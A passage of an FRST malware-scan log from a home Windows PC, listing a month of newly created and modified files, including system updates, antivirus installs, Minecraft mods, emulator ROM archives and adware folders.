2013-08-18 14:02 - 2013-07-09 06:46 - 00103936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2013-08-18 14:01 - 2013-07-19 03:58 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2013-08-18 14:01 - 2013-07-19 03:41 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2013-08-18 14:00 - 2013-07-25 11:25 - 01888768 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL
2013-08-18 14:00 - 2013-07-09 07:51 - 01217024 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2013-08-18 14:00 - 2013-07-09 06:52 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2013-08-18 14:00 - 2013-07-06 08:03 - 01910208 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2013-08-18 14:00 - 2013-06-15 06:32 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2013-08-17 14:07 - 2013-08-17 14:07 - 00000000 ____D C:\Users\Niklas\Desktop\Neuer Ordner
2013-08-17 13:56 - 2013-08-17 13:56 - 00148503 _____ C:\Users\Niklas\Downloads\ForceOP.zip
2013-08-17 13:32 - 2013-08-17 13:34 - 34632602 _____ C:\Users\Niklas\Downloads\secondlwjgl5.rar
2013-08-17 12:52 - 2013-08-17 12:58 - 25730157 _____ C:\Users\Niklas\Downloads\0389 - Animal Crossing - Wild World (E)(M5).rar
2013-08-17 12:33 - 2013-08-17 12:33 - 00000000 ____D C:\ProgramData\AskPartnerNetwork
2013-08-17 12:33 - 2013-08-17 12:33 - 00000000 ____D C:\Program Files (x86)\AskPartnerNetwork
2013-08-16 14:32 - 2013-08-16 14:34 - 04570948 _____ C:\Users\Niklas\Desktop\video-2013-08-15-11-52-52.mp4
2013-08-15 19:02 - 2013-08-15 19:09 - 14409496 _____ C:\Users\Niklas\Downloads\DOS+WIN31 Floppies.rar
2013-08-15 17:37 - 2013-08-15 17:46 - 00000074 _____ C:\Users\Niklas\Desktop\wdw.html
2013-08-15 15:58 - 2013-08-15 15:58 - 00293672 _____ C:\Users\Niklas\Downloads\jsoup-1.7.2.jar
2013-08-15 15:53 - 2013-08-15 15:54 - 03449936 _____ C:\Users\Niklas\Downloads\httpcomponents-client-4.2.5-bin.zip
2013-08-15 13:53 - 2013-07-25 10:57 - 01620992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL
2013-08-13 19:53 - 2013-08-15 20:42 - 00000125 _____ C:\Users\Niklas\Desktop\codes.php
2013-08-13 13:20 - 2013-08-13 13:36 - 00000265 _____ C:\Users\Niklas\Desktop\index.html
2013-08-13 11:43 - 2008-09-02 14:14 - 134217728 _____ C:\Users\Niklas\Desktop\Final Fantasy IV.nds
2013-08-13 11:20 - 2013-08-13 11:42 - 85929189 _____ C:\Users\Niklas\Downloads\Final Fantasy IV.rar
2013-08-05 18:47 - 2013-08-05 18:56 - 208666624 _____ C:\Users\Niklas\Downloads\android-x86-4.3-20130725.iso
2013-08-05 18:34 - 2013-08-05 19:49 - 00000000 ____D C:\Users\Niklas\Desktop\bios
2013-08-05 18:23 - 2013-08-05 18:31 - 205650432 _____ C:\Users\Niklas\Downloads\androVM_vbox86t_4.1.1_r4-20121119-gapps-houdini-flash.ova
2013-08-05 18:10 - 2013-08-15 19:08 - 00000000 ____D C:\Users\Niklas\VirtualBox VMs
2013-08-05 18:00 - 2013-08-05 18:09 - 208321536 _____ C:\Users\Niklas\Downloads\androVM_vbox86p_4.1.1_r4-20121119-gapps-houdini-flash.ova
2013-08-05 17:59 - 2013-08-16 14:04 - 00000000 ____D C:\Users\Niklas\.VirtualBox
2013-08-05 17:57 - 2013-08-05 17:57 - 00001080 _____ C:\Users\Public\Desktop\Oracle VM VirtualBox.lnk
2013-08-05 17:57 - 2013-07-04 15:58 - 00238352 _____ (Oracle Corporation) C:\Windows\system32\Drivers\VBoxDrv.sys
2013-08-05 17:57 - 2013-07-04 15:57 - 00120080 _____ (Oracle Corporation) C:\Windows\system32\Drivers\VBoxUSBMon.sys
2013-08-05 17:49 - 2013-08-05 17:53 - 99776784 _____ (Oracle Corporation) C:\Users\Niklas\Downloads\VirtualBox-4.2.16-86992-Win.exe
2013-08-05 17:43 - 2013-08-05 17:44 - 08924620 _____ C:\Users\Niklas\Downloads\AndroVMplayer-Win64-20130208.zip
2013-08-05 16:45 - 2013-08-05 16:45 - 00001811 _____ C:\Users\Public\Desktop\Start BlueStacks.lnk
2013-08-05 16:45 - 2013-08-05 16:45 - 00001784 _____ C:\Users\Public\Desktop\Apps.lnk
2013-08-05 16:44 - 2013-08-05 17:32 - 00000000 ____D C:\Program Files (x86)\BlueStacks
2013-08-05 16:44 - 2013-08-05 16:44 - 00000000 ____D C:\ProgramData\BlueStacks
2013-08-05 16:27 - 2013-08-05 16:27 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\Niklas\Downloads\revosetup95.exe
2013-08-05 16:27 - 2013-08-05 16:27 - 00001268 _____ C:\Users\Niklas\Desktop\Revo Uninstaller.lnk
2013-08-05 16:27 - 2013-08-05 16:27 - 00000000 ____D C:\Program Files (x86)\VS Revo Group
2013-08-05 16:06 - 2013-08-05 16:06 - 09174000 _____ (BlueStack Systems Inc.) C:\Users\Niklas\Downloads\BlueStacks-SplitInstaller_native_0.7.16.exe
2013-08-02 17:53 - 2013-08-02 17:55 - 33150376 _____ (Oracle Corporation) C:\Users\Niklas\Downloads\jre-7u25-windows-x64 (2).exe
2013-08-02 17:14 - 2013-08-02 17:14 - 00001166 _____ C:\Windows\wininit.ini
2013-07-31 18:41 - 2013-07-31 18:42 - 08086972 _____ C:\Users\Niklas\Desktop\Lan welt , N-M.rar
2013-07-31 18:33 - 2013-07-31 18:33 - 00506821 _____ C:\Users\Niklas\Downloads\MC_Open_Launcher (2).jar
2013-07-31 18:33 - 2013-07-31 18:33 - 00506821 _____ C:\Users\Niklas\Desktop\MC_Open_Launcher (2).jar
2013-07-31 18:30 - 2013-07-31 18:30 - 00000453 _____ C:\Users\Niklas\Downloads\mol.txt
2013-07-31 18:06 - 2013-07-31 18:06 - 00000083 _____ C:\Users\Niklas\Desktop\MOL_Properties.properties
2013-07-31 18:05 - 2013-07-31 18:05 - 00704826 _____ C:\Users\Niklas\Downloads\Minecraft 1.6.1.zip
2013-07-31 18:05 - 2013-07-02 22:15 - 00773177 _____ (Your Company) C:\Users\Niklas\Desktop\Minecraft 1.6.1 CRACK.exe
2013-07-31 17:50 - 2013-07-31 17:50 - 00352775 _____ C:\Users\Niklas\Downloads\OptiFine_1.5.2_HD_D5.zip
2013-07-31 15:51 - 2013-07-31 15:51 - 00097946 _____ C:\Users\Niklas\Downloads\TooManyItems2013_04_25_1.5.2 (3).zip
2013-07-31 15:27 - 2013-07-31 15:28 - 02014600 _____ C:\Users\Niklas\Downloads\minecraftforge-universal-1.5.2-7.8.0.712.zip
2013-07-31 14:48 - 2013-07-31 14:48 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2013-07-31 14:26 - 2013-07-31 14:26 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\WinRAR
2013-07-31 14:00 - 2013-07-31 14:00 - 01758824 _____ C:\Users\Niklas\Downloads\winrar-x64-420d (1).exe
2013-07-31 13:42 - 2013-07-31 13:41 - 00263592 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2013-07-31 13:42 - 2013-07-31 13:41 - 00175016 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe
2013-07-31 13:42 - 2013-07-31 13:41 - 00175016 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe
2013-07-31 13:42 - 2013-07-31 13:41 - 00096168 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2013-07-31 13:41 - 2013-07-31 13:41 - 00000000 ____D C:\Program Files (x86)\Java
2013-07-31 13:40 - 2013-07-31 13:41 - 31714728 _____ (Oracle Corporation) C:\Users\Niklas\Downloads\jre-7u25-windows-i586.exe
2013-07-31 13:37 - 2013-07-31 13:39 - 33150376 _____ (Oracle Corporation) C:\Users\Niklas\Downloads\jre-7u25-windows-x64 (1).exe
2013-07-31 13:31 - 2013-07-31 13:30 - 00312232 _____ (Oracle Corporation) C:\Windows\system32\javaws.exe
2013-07-31 13:31 - 2013-07-31 13:30 - 00189352 _____ (Oracle Corporation) C:\Windows\system32\javaw.exe
2013-07-31 13:31 - 2013-07-31 13:30 - 00188840 _____ (Oracle Corporation) C:\Windows\system32\java.exe
2013-07-31 13:31 - 2013-07-31 13:30 - 00108968 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge-64.dll
2013-07-31 13:28 - 2013-07-31 13:29 - 33150376 _____ (Oracle Corporation) C:\Users\Niklas\Downloads\jre-7u25-windows-x64.exe
2013-07-31 13:19 - 2013-07-31 13:19 - 00903080 _____ (Oracle Corporation) C:\Users\Niklas\Downloads\chromeinstall-7u25.exe
2013-07-31 13:14 - 2013-07-31 13:14 - 02033732 _____ C:\Users\Niklas\Downloads\minecraftforge-universal-1.5.2-7.8.1.738.zip
2013-07-29 13:18 - 2013-08-13 10:15 - 00000000 ____D C:\Users\Niklas\AppData\Local\CrashDumps
2013-07-29 10:15 - 2013-08-22 11:18 - 00098358 _____ C:\Windows\PFRO.log
2013-07-28 19:13 - 2013-07-28 19:18 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\Stella
2013-07-28 19:13 - 2013-07-28 19:13 - 01486815 _____ (The Stella Team                                             ) C:\Users\Niklas\Downloads\Stella-3.6-win32.exe
2013-07-28 19:13 - 2013-07-28 19:13 - 00000000 ____D C:\Program Files (x86)\Stella
2013-07-28 19:08 - 2013-07-28 19:08 - 00006628 _____ C:\Users\Niklas\Downloads\E.T. the Extra-Terrestrial.zip
2013-07-28 16:49 - 2013-07-28 16:49 - 00003000 _____ C:\{BE567149-6FEF-4828-835D-9A7A4805359B}
2013-07-28 16:43 - 2013-07-28 16:43 - 00000000 ____D C:\Windows\System32\Tasks\Norton Identity Safe
2013-07-28 14:25 - 2013-07-28 14:28 - 58909032 _____ (GIANTS Software                                             ) C:\Users\Niklas\Downloads\FarmingSimulator2013Patch1.4DE.exe
2013-07-27 18:15 - 2013-07-27 18:15 - 00237126 _____ C:\Users\Niklas\Downloads\Bankofhagenstedt.exe
2013-07-27 16:47 - 2013-07-27 16:49 - 07406374 _____ C:\Users\Niklas\Downloads\VeenhuisW400.exe
2013-07-27 15:35 - 2013-07-27 15:36 - 00000000 ____D C:\Users\Niklas\Documents\My Games
2013-07-27 15:28 - 2013-07-27 15:28 - 00001287 _____ C:\Users\Niklas\Desktop\Landwirtschafts Simulator 2013 .lnk
2013-07-27 15:25 - 2013-07-28 15:04 - 00000000 ____D C:\Program Files (x86)\Landwirtschafts Simulator 2013
2013-07-27 14:14 - 2013-07-27 14:14 - 00000000 ____D C:\Windows\System32\Tasks\Norton AntiVirus
2013-07-27 14:12 - 2013-07-27 14:12 - 00000000 ____D C:\Windows\system32\Drivers\NSTx64
2013-07-27 14:12 - 2013-07-27 14:12 - 00000000 ____D C:\Program Files (x86)\Norton Identity Safe
2013-07-27 14:11 - 2013-08-13 10:25 - 00000000 ____D C:\Program Files\Common Files\Symantec Shared
2013-07-27 14:11 - 2013-07-27 14:11 - 00003218 _____ C:\Windows\System32\Tasks\Norton WSC Integration
2013-07-27 14:10 - 2013-08-13 12:42 - 00000000 ____D C:\ProgramData\Norton
2013-07-27 14:10 - 2013-07-27 14:10 - 00000000 ____D C:\Windows\system32\Drivers\NAVx64
2013-07-27 13:53 - 2013-07-27 14:00 - 186556480 ____N (Symantec Corporation) C:\Users\Niklas\Downloads\NAV-ESD-20-4-0-40-GE.exe
2013-07-27 13:50 - 2013-07-27 13:50 - 00867880 _____ C:\Users\Niklas\Downloads\Norton20_Removal_Tool.exe
2013-07-27 13:50 - 2013-07-27 13:50 - 00867880 _____ C:\Users\Niklas\Desktop\Norton20_Removal_Tool.exe
2013-07-26 20:32 - 2013-07-26 20:32 - 01975130 _____ C:\Users\Niklas\Downloads\minecraftforge-universal-1.5.2-7.8.0.684 (2).zip
2013-07-26 20:31 - 2013-07-26 20:32 - 01975130 _____ C:\Users\Niklas\Downloads\minecraftforge-universal-1.5.2-7.8.0.684 (1).zip
2013-07-26 20:06 - 2013-08-18 18:26 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\.minecraft
2013-07-26 19:38 - 2013-07-26 19:39 - 00695296 _____ (AnjoCaido) C:\Users\Niklas\Desktop\minecraftSP.exe
2013-07-26 19:24 - 2013-07-26 19:24 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\TrojanHunter
2013-07-26 19:16 - 2013-07-26 19:16 - 02061008 _____ (Mister Group                                                ) C:\Users\Niklas\Downloads\SystemExplorerSetup_422 (1).exe
2013-07-26 19:03 - 2013-07-26 19:03 - 00059392 ____R C:\Windows\SysWOW64\streamhlp.dll
2013-07-26 19:03 - 2013-07-26 19:03 - 00000000 ____D C:\ProgramData\TrojanHunter
2013-07-26 18:23 - 2013-07-26 18:23 - 04292608 _____ C:\Users\Niklas\Downloads\hamachi_2.1.0.362.msi
2013-07-26 18:14 - 2013-08-21 18:40 - 00000000 ____D C:\Program Files (x86)\System Explorer
2013-07-26 18:14 - 2013-07-27 23:36 - 00000000 ____D C:\ProgramData\SystemExplorer
2013-07-26 18:13 - 2013-07-26 18:14 - 02061008 _____ (Mister Group                                                ) C:\Users\Niklas\Downloads\SystemExplorerSetup_422.exe
2013-07-26 14:34 - 2013-07-26 14:34 - 00137266 _____ C:\Users\Niklas\Downloads\elegant.sit
2013-07-26 14:34 - 2013-07-26 14:34 - 00045185 _____ C:\Users\Niklas\Downloads\elegant.zip
2013-07-26 14:34 - 2013-07-26 14:34 - 00045185 _____ C:\Users\Niklas\Downloads\elegant (1).zip
2013-07-26 14:31 - 2013-07-26 14:31 - 00029060 _____ C:\Users\Niklas\Downloads\Acens.ttf
2013-07-26 09:34 - 2013-08-22 11:18 - 00001904 _____ C:\Windows\setupact.log
2013-07-26 09:34 - 2013-07-26 19:42 - 00633296 _____ C:\Windows\system32\FNTCACHE.DAT
2013-07-26 09:34 - 2013-07-26 09:34 - 00000000 _____ C:\Windows\setuperr.log
2013-07-25 17:36 - 2013-07-25 17:36 - 00000000 ____D C:\Users\Niklas\AppData\Local\{C938435F-A241-4E9B-80FC-B5E38F7C91FB}
2013-07-25 17:33 - 2013-07-25 17:33 - 00177672 _____ C:\Users\Niklas\Desktop\music1.OGG
2013-07-25 16:58 - 2013-07-25 16:59 - 10627171 _____ C:\Users\Niklas\Documents\lib.rar
2013-07-25 16:54 - 2013-07-25 16:55 - 01981647 _____ C:\Users\Niklas\Documents\minecraftforge-universal-1.5.2-7.8.0.686.zip
2013-07-25 14:38 - 2013-07-25 14:39 - 00570109 _____ C:\Users\Niklas\Downloads\billy-argel_beyond-sky.zip
2013-07-25 13:45 - 2013-07-25 13:45 - 00031788 _____ C:\Users\Niklas\Downloads\thump (1).wav
2013-07-25 11:04 - 2013-07-25 11:04 - 00002457 _____ C:\Users\Niklas\Downloads\TextFieldDemo.jnlp
2013-07-25 11:04 - 2013-07-25 11:04 - 00002457 _____ C:\Users\Niklas\Downloads\TextFieldDemo (1).jnlp
2013-07-23 14:48 - 2013-07-27 13:42 - 00195816 _____ C:\Users\Niklas\AppData\Local\GDIPFONTCACHEV1.DAT
2013-07-23 14:01 - 2013-07-23 14:05 - 80978288 _____ (Intel(R) Corporation) C:\Users\Niklas\Downloads\Wireless_15.3.1_s64.exe
2013-07-23 12:48 - 2013-07-23 12:49 - 04891155 _____ C:\Users\Niklas\Downloads\Eminent.tip
2013-07-23 12:46 - 2013-07-27 23:36 - 00000000 ___HD C:\Windows\Icons
2013-07-23 12:46 - 2013-07-23 12:46 - 01958858 _____ C:\Users\Niklas\Downloads\FarawayDream.tip
2013-07-23 12:25 - 2013-07-23 12:26 - 04396440 _____ (Piriform Ltd) C:\Users\Niklas\Downloads\ccsetup403.exe
2013-07-23 12:03 - 2013-07-23 12:04 - 02918488 _____ (Martin Malík - REALiX                                       ) C:\Users\Niklas\Downloads\hw64_420.exe
2013-07-23 10:41 - 2013-07-23 10:43 - 19067867 _____ C:\Users\Niklas\Downloads\omnimo_5_0_for_rainmeter_by_fediafedia.zip
2013-07-23 10:41 - 2013-07-23 10:41 - 05209550 _____ C:\Users\Niklas\Downloads\Omnimo Screenshots - Imgur.zip
2013-07-23 10:36 - 2013-07-23 21:33 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\Rainmeter
2013-07-23 10:35 - 2013-07-23 10:35 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\IObit
2013-07-23 10:23 - 2013-07-23 11:01 - 00000000 ____D C:\Windows\UXBackup
2013-07-23 10:20 - 2013-07-23 10:20 - 01386624 _____ C:\Users\Niklas\Downloads\Rainmeter-2.5.exe
2013-07-23 10:14 - 2013-07-23 10:20 - 61091169 _____ C:\Users\Niklas\Downloads\8TP7.zip
2013-07-23 10:12 - 2013-07-23 10:12 - 04685607 _____ C:\Users\Niklas\Downloads\Minecraft-Modpack_1.6.2.zip

==================== One Month Modified Files and Folders =======

2013-08-22 11:31 - 2013-08-22 11:31 - 00000000 ____D C:\FRST
2013-08-22 11:29 - 2013-08-22 11:31 - 01576476 _____ (Farbar) C:\Users\Niklas\Desktop\FRST64.exe
2013-08-22 11:29 - 2013-08-22 11:29 - 01576476 _____ (Farbar) C:\Users\Niklas\Downloads\FRST64.exe
2013-08-22 11:28 - 2012-08-11 11:41 - 00000346 ____H C:\Windows\Tasks\WxDFastUpdaterTask{3C1BA1D8-EAAE-42BB-9BC9-85A27908B34F}.job
2013-08-22 11:27 - 2009-07-14 06:45 - 00024400 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2013-08-22 11:27 - 2009-07-14 06:45 - 00024400 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2013-08-22 11:21 - 2012-07-21 21:08 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\Skype
2013-08-22 11:21 - 2012-01-19 09:26 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2013-08-22 11:21 - 2012-01-19 09:26 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2013-08-22 11:18 - 2013-07-29 10:15 - 00098358 _____ C:\Windows\PFRO.log
2013-08-22 11:18 - 2013-07-26 09:34 - 00001904 _____ C:\Windows\setupact.log
2013-08-22 11:18 - 2012-08-11 11:42 - 00000328 ____H C:\Windows\Tasks\GBoxUpdaterTask{131876AC-419C-40EF-98DD-8C8C18A85D0B}.job
2013-08-22 11:18 - 2011-10-27 21:34 - 00000000 ____D C:\ProgramData\NVIDIA
2013-08-22 11:18 - 2009-07-14 07:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2013-08-21 20:44 - 2012-01-19 09:24 - 01587206 _____ C:\Windows\WindowsUpdate.log
2013-08-21 18:48 - 2013-08-21 18:48 - 00003836 _____ C:\Users\Niklas\Downloads\fgjmgaonhcgbelpohkmegjaneegiigil.crx
2013-08-21 18:43 - 2013-08-21 18:42 - 00266843 _____ C:\ProgramData\GBox.rar
2013-08-21 18:40 - 2013-08-21 18:40 - 00001090 _____ C:\Users\Public\Desktop\System Explorer.lnk
2013-08-21 18:40 - 2013-07-26 18:14 - 00000000 ____D C:\Program Files (x86)\System Explorer
2013-08-21 18:36 - 2013-08-21 18:36 - 02061008 _____ (Mister Group                                                ) C:\Users\Niklas\Downloads\SystemExplorerSetup_422 (2).exe
2013-08-21 18:27 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\system32\NDF
2013-08-21 18:26 - 2011-10-28 14:11 - 00769402 _____ C:\Windows\system32\perfh007.dat
2013-08-21 18:26 - 2011-10-28 14:11 - 00176100 _____ C:\Windows\system32\perfc007.dat
2013-08-21 18:26 - 2009-07-14 07:13 - 01816170 _____ C:\Windows\system32\PerfStringBackup.INI
2013-08-21 14:37 - 2013-08-21 14:33 - 00000000 ____D C:\Users\Niklas\Desktop\php
2013-08-21 14:37 - 2012-09-23 18:06 - 00000000 ____D C:\Users\Niklas\AppData\Local\Eclipse
2013-08-21 14:32 - 2013-08-21 14:25 - 148380279 _____ C:\Users\Niklas\Downloads\eclipse-php-helios-SR2-win32-x86_64.zip
2013-08-21 13:39 - 2013-08-21 13:39 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\Avira
2013-08-21 13:34 - 2013-08-21 13:34 - 00083672 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avnetflt.sys
2013-08-21 13:33 - 2013-08-21 13:33 - 00001998 _____ C:\Users\Public\Desktop\Avira Control Center.lnk
2013-08-21 13:32 - 2013-08-21 13:32 - 00000000 ____D C:\Program Files (x86)\Avira
2013-08-21 13:32 - 2012-01-19 19:52 - 00000000 ____D C:\ProgramData\Avira
2013-08-18 23:26 - 2013-02-11 20:52 - 00000000 ____D C:\Users\Niklas\.android
2013-08-18 23:26 - 2009-07-14 05:20 - 00000000 ____D C:\Program Files\Common Files\Microsoft Shared
2013-08-18 23:25 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\registration
2013-08-18 23:23 - 2012-12-11 16:24 - 00000000 ____D C:\Users\Niklas\Desktop\java
2013-08-18 18:31 - 2013-07-20 23:28 - 00000000 ____D C:\Windows\system32\MRT
2013-08-18 18:28 - 2011-10-27 23:06 - 78161360 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2013-08-18 18:26 - 2013-07-26 20:06 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\.minecraft
2013-08-18 17:26 - 2013-08-18 17:18 - 133456378 _____ C:\Users\Niklas\Downloads\Dragon Quest IX Hüter Des Himmels.rar
2013-08-18 14:16 - 2013-08-21 13:32 - 00130016 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avipbb.sys
2013-08-18 14:16 - 2013-08-21 13:32 - 00100712 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avgntflt.sys
2013-08-18 14:16 - 2013-08-21 13:32 - 00028600 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avkmgr.sys
2013-08-18 14:16 - 2013-08-18 14:16 - 02717364 _____ C:\Users\Niklas\Downloads\TwilightForest Mod 1.5.2.zip
2013-08-18 13:48 - 2012-07-26 17:34 - 00000000 ____D C:\Windows\System32\Tasks\NCH Software
2013-08-18 13:48 - 2012-01-19 09:32 - 00000000 ___RD C:\Users\Niklas
2013-08-17 14:07 - 2013-08-17 14:07 - 00000000 ____D C:\Users\Niklas\Desktop\Neuer Ordner
2013-08-17 13:56 - 2013-08-17 13:56 - 00148503 _____ C:\Users\Niklas\Downloads\ForceOP.zip
2013-08-17 13:34 - 2013-08-17 13:32 - 34632602 _____ C:\Users\Niklas\Downloads\secondlwjgl5.rar
2013-08-17 12:58 - 2013-08-17 12:52 - 25730157 _____ C:\Users\Niklas\Downloads\0389 - Animal Crossing - Wild World (E)(M5).rar
2013-08-17 12:33 - 2013-08-17 12:33 - 00000000 ____D C:\ProgramData\AskPartnerNetwork
2013-08-17 12:33 - 2013-08-17 12:33 - 00000000 ____D C:\Program Files (x86)\AskPartnerNetwork
2013-08-16 14:34 - 2013-08-16 14:32 - 04570948 _____ C:\Users\Niklas\Desktop\video-2013-08-15-11-52-52.mp4
2013-08-16 14:04 - 2013-08-05 17:59 - 00000000 ____D C:\Users\Niklas\.VirtualBox
2013-08-16 13:40 - 2011-10-27 22:13 - 00000000 ____D C:\Windows\Panther
2013-08-15 20:42 - 2013-08-13 19:53 - 00000125 _____ C:\Users\Niklas\Desktop\codes.php
2013-08-15 20:42 - 2013-02-10 20:45 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\FileZilla
2013-08-15 19:09 - 2013-08-15 19:02 - 14409496 _____ C:\Users\Niklas\Downloads\DOS+WIN31 Floppies.rar
2013-08-15 19:08 - 2013-08-05 18:10 - 00000000 ____D C:\Users\Niklas\VirtualBox VMs
2013-08-15 17:46 - 2013-08-15 17:37 - 00000074 _____ C:\Users\Niklas\Desktop\wdw.html
2013-08-15 15:58 - 2013-08-15 15:58 - 00293672 _____ C:\Users\Niklas\Downloads\jsoup-1.7.2.jar
2013-08-15 15:54 - 2013-08-15 15:53 - 03449936 _____ C:\Users\Niklas\Downloads\httpcomponents-client-4.2.5-bin.zip
2013-08-13 13:36 - 2013-08-13 13:20 - 00000265 _____ C:\Users\Niklas\Desktop\index.html
2013-08-13 12:42 - 2013-07-27 14:10 - 00000000 ____D C:\ProgramData\Norton
2013-08-13 11:42 - 2013-08-13 11:20 - 85929189 _____ C:\Users\Niklas\Downloads\Final Fantasy IV.rar
2013-08-13 10:25 - 2013-07-27 14:11 - 00000000 ____D C:\Program Files\Common Files\Symantec Shared
2013-08-13 10:15 - 2013-07-29 13:18 - 00000000 ____D C:\Users\Niklas\AppData\Local\CrashDumps
2013-08-05 19:49 - 2013-08-05 18:34 - 00000000 ____D C:\Users\Niklas\Desktop\bios
2013-08-05 18:56 - 2013-08-05 18:47 - 208666624 _____ C:\Users\Niklas\Downloads\android-x86-4.3-20130725.iso
2013-08-05 18:31 - 2013-08-05 18:23 - 205650432 _____ C:\Users\Niklas\Downloads\androVM_vbox86t_4.1.1_r4-20121119-gapps-houdini-flash.ova
2013-08-05 18:09 - 2013-08-05 18:00 - 208321536 _____ C:\Users\Niklas\Downloads\androVM_vbox86p_4.1.1_r4-20121119-gapps-houdini-flash.ova
2013-08-05 17:57 - 2013-08-05 17:57 - 00001080 _____ C:\Users\Public\Desktop\Oracle VM VirtualBox.lnk
2013-08-05 17:57 - 2012-08-14 18:56 - 00000000 ____D C:\Program Files\Oracle
2013-08-05 17:53 - 2013-08-05 17:49 - 99776784 _____ (Oracle Corporation) C:\Users\Niklas\Downloads\VirtualBox-4.2.16-86992-Win.exe
2013-08-05 17:44 - 2013-08-05 17:43 - 08924620 _____ C:\Users\Niklas\Downloads\AndroVMplayer-Win64-20130208.zip
2013-08-05 17:32 - 2013-08-05 16:44 - 00000000 ____D C:\Program Files (x86)\BlueStacks
2013-08-05 16:45 - 2013-08-05 16:45 - 00001811 _____ C:\Users\Public\Desktop\Start BlueStacks.lnk
2013-08-05 16:45 - 2013-08-05 16:45 - 00001784 _____ C:\Users\Public\Desktop\Apps.lnk
2013-08-05 16:45 - 2009-07-14 05:20 - 00000000 __RHD C:\Users\Public\Libraries
2013-08-05 16:44 - 2013-08-05 16:44 - 00000000 ____D C:\ProgramData\BlueStacks
2013-08-05 16:44 - 2013-07-22 11:11 - 00000000 ____D C:\ProgramData\BlueStacksSetup
2013-08-05 16:27 - 2013-08-05 16:27 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\Niklas\Downloads\revosetup95.exe
2013-08-05 16:27 - 2013-08-05 16:27 - 00001268 _____ C:\Users\Niklas\Desktop\Revo Uninstaller.lnk
2013-08-05 16:27 - 2013-08-05 16:27 - 00000000 ____D C:\Program Files (x86)\VS Revo Group
2013-08-05 16:06 - 2013-08-05 16:06 - 09174000 _____ (BlueStack Systems Inc.) C:\Users\Niklas\Downloads\BlueStacks-SplitInstaller_native_0.7.16.exe
2013-08-04 19:51 - 2012-03-28 18:29 - 00003704 _____ C:\Windows\System32\Tasks\Java Update Scheduler
2013-08-03 15:01 - 2012-04-02 12:26 - 00000000 ____D C:\Users\Niklas\AppData\Local\LogMeIn Hamachi
2013-08-02 20:32 - 2012-11-01 13:12 - 00000000 ____D C:\Users\Niklas\Desktop\minecraft modding
2013-08-02 17:55 - 2013-08-02 17:53 - 33150376 _____ (Oracle Corporation) C:\Users\Niklas\Downloads\jre-7u25-windows-x64 (2).exe
2013-08-02 17:14 - 2013-08-02 17:14 - 00001166 _____ C:\Windows\wininit.ini
2013-08-02 17:14 - 2012-06-10 20:03 - 00000000 ____D C:\Program Files\Web Assistant
2013-07-31 21:36 - 2013-06-11 13:23 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\uTorrent
2013-07-31 18:45 - 2013-07-01 18:42 - 00000000 ____D C:\Users\Niklas\minecraft
2013-07-31 18:42 - 2013-07-31 18:41 - 08086972 _____ C:\Users\Niklas\Desktop\Lan welt , N-M.rar
2013-07-31 18:33 - 2013-07-31 18:33 - 00506821 _____ C:\Users\Niklas\Downloads\MC_Open_Launcher (2).jar
2013-07-31 18:33 - 2013-07-31 18:33 - 00506821 _____ C:\Users\Niklas\Desktop\MC_Open_Launcher (2).jar
2013-07-31 18:30 - 2013-07-31 18:30 - 00000453 _____ C:\Users\Niklas\Downloads\mol.txt
2013-07-31 18:27 - 2013-06-20 16:46 - 00000364 _____ C:\Users\Niklas\Documents\launcher_profiles.json
2013-07-31 18:06 - 2013-07-31 18:06 - 00000083 _____ C:\Users\Niklas\Desktop\MOL_Properties.properties
2013-07-31 18:05 - 2013-07-31 18:05 - 00704826 _____ C:\Users\Niklas\Downloads\Minecraft 1.6.1.zip
2013-07-31 17:54 - 2012-09-23 19:21 - 00000000 ____D C:\Users\Niklas\AppData\Local\Paint.NET
2013-07-31 17:50 - 2013-07-31 17:50 - 00352775 _____ C:\Users\Niklas\Downloads\OptiFine_1.5.2_HD_D5.zip
2013-07-31 15:51 - 2013-07-31 15:51 - 00097946 _____ C:\Users\Niklas\Downloads\TooManyItems2013_04_25_1.5.2 (3).zip
